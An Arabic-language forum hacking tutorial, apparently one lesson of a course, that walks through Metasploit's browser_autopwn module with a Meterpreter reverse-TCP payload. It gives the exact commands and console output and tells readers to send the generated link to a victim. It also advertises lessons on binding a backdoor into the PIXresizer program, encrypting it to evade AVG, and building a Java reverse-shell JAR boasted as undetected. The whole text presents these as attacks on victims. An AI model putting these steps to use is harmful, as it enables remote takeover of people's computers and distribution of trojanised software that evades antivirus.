1- و ماهي التغرة التي استعملها من اجل اختراق عن طريق رابط فقط إستخدم autopwn brawser شرحتها هنا (brwser_autopwn)(عمل باكدور ببايلودmterpreter و دمجه و تشفيره لتخطي الحمايات)(عمل باكدور ببالودjava) السلام عليكم و رحمة الله و بركاته أرجو ان تكونو بتمام العافية اليوم درسنا سهل بس لا زم الإنتباه و رائع سنتطرق في هذا الدرس إلي كيفية عمل autopwn لثغرات المتصفح brewser تقلو او لا ما معني autopwn أقلكم هي أدات قوية موجوة في الميتا تستخدم للإختراق الأوتو ماتيكي لماذ تستخدم الأدات : ستتخدم للإختراق و هي تجرب جميع الثغرات المتاحة و تخترق الجهاز و نسبة حدوث الإختراق (داخلي أو خارجي ) هي 90 % و انا شارحها بالتفصيل في الدرس إلي فات من الدورة تبعي و الأن التساءل حول لماذا نقوم بعمل الإختراق الأوتوماتيكي لثغرات النتصفح اقلكم أنا نقوم بذالك من اجل تحربة جميع ثغرات المتصفح في رابط واحد فقط و ب*الك نزيد من نسبةالإختراق 50% مثال : ===== إنت تريد إختراق واحد عبر ثغرة المتصفح بس إنت مو عارف شو المتصفح إلي يستخدمو mozila .chorme .... و مش عارف الإصدار إلي تستخدمو الضحية فلو إنت غستخدمت ثغرة موزيلا فارفوكس و الضحية يستخدم الإكسبلور راح يفشل الإختراق و حتي إذا إستخدمت إنت ثغرةإكسبلور بس إصدار لتعمل عليه الثغرة مو نفس إصدار الضحية فراح يفشل إختراقك ل*الك نلجأ إلي إستخدام autopwn brewsers فهي تجرب جميع الثغرات و الرابط إلي راح تعطيه للضحية راح يكون محنك من جميع الثغرات يعني ماراح تقلق من نوع أو إصدار متصفح الضخية تقول كيف أنا ساشرح نبدء ==== نفتح تارمنل نفتح الكونسول عن طريق الأمر msfconsole نتظر تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 719x558. بعدين نكتب الأمر search autopwn نختار الأولي auxiliary/server/browser_autopwn وذالك بستخدام الأمر use ثم إختيارنا و يصر الأمر كتالي use auxiliary/server/browser_autopwn ثم نخار الباليود المستخدم أنا راح اختار باليود المتر برتر فهو الأحسن و ساشرحه في دروس قادمة set payload windows/meterpreter/reverse_tcp الأن نتكتب الأمر show options لمعرفة متطلبات الثغرة تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 743x600. نعبي اﻷهم فقط الأن نكتب الإبي تبعنا و ملاحظة : ========= إذا كان الإختراق داخلي نكتب الإبي الداخلي نعرفه عن طريق الأمر ifconfig إذا كان الإختراق خارجي نكتب الإبي الخارحي أو ال no-ip تبعك أحسن بكثير نكتبه set lhost 192.168.117.129 ثم البورت المستخدم و هو لازم يكون مفتوح في الروتر و في جدار الحماية و هو مستخدم تلقائيا البورت 8080 و ممكن نغيرو بس إحنا نخله كما هو ثم نعبي الخيار الأخير وهو ال URIPATH نكتب / set URIPATH ثم الأمر الاخير run أو exploit حسب ما تحب تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 683x461. ننتظر......... راح في اﻷخيريعطيك رابط و هو الرابط إلي تبعثو للضحية أنا النتيجة إلي ظهرت لي في الخير msf auxiliary(browser_autopwn) > run[*] Auxiliary module running as background job msf auxiliary(browser_autopwn) >[*] Starting exploit modules on host 192.168.117.129...[*] --- ...snip...[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/zCtg7oC[*] Local IP: http://192.168.117.129:8080/zCtg7oC[*] Server started.[*] Starting exploit multi/browser/mozilla_compareto with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/vTNGJx[*] Local IP: http://192.168.117.129:8080/vTNGJx[*] Server started.[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7[*] Local IP: http://192.168.117.129:8080/abmR33jxStsF7[*] Server started.[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler ...snip...[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV[*] Local IP: http://192.168.117.129:8080/RdDDhKANpV[*] Server started.[*] --- Done, found 12 exploit modules[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.117.129:8080/[*] Server started. هذا الرابط إلي نبعثو للضحية http://192.168.117.129:8080/ و إختراق موفق هذه الدورة مقدمة من قبل somari و من لم تظهر معه الصور رابط تحميلها http://www.mediafire.com/?xgbon6v0ch1dbc9 الدرس الثاني و سيكون شرحا لكيفية عمل باك دور و دمجه مع برنامج و تشفيره و تخطي حماية avg المشهورة و أنا شارح فيه أيضا باليود meterpreter و ساشرح نو عين أخرين من الباليودات في الدروس القادمة أتركمكم مع الشرح <HD> رابط تحميله http://www.mediafire.com/?6oxpo4eh5p7k347 ملاحظة في الدرس2 لقد تم دمج الباك دور مع برنامج تصغير الصورPIXresizer الدرس3 : و هو حول كيفية إنشاء باكدور java كلين غير مشكوف من اي حماية إلي راح يكون يصيغة jar. و هاذا الباك دور متميز بتخطيه للحمايات كلها حتي بدون تشفير و هو من ًيستخدم لإنشاءه باليود <<و انا شارحو في الدرس>> java/meterpreter/reverse_tcp و هو من أقوي البالودات الموجودة علي الساحة و هو يخلق إتصال عكسي و أنا أنصح يه لتخطي الجدران النارية و الأونتي فايروس إذا كانت الضحية تستخدمهم رابط نتائج الفحص مع العلم بدون تشفير <<مذهل>> http://www.virustotal.com/file-scan/...672-1325275849 أترككم مع الدرس<<HD>> رابط التحميل http://www.mediafire.com/?va72bqvq2qgax68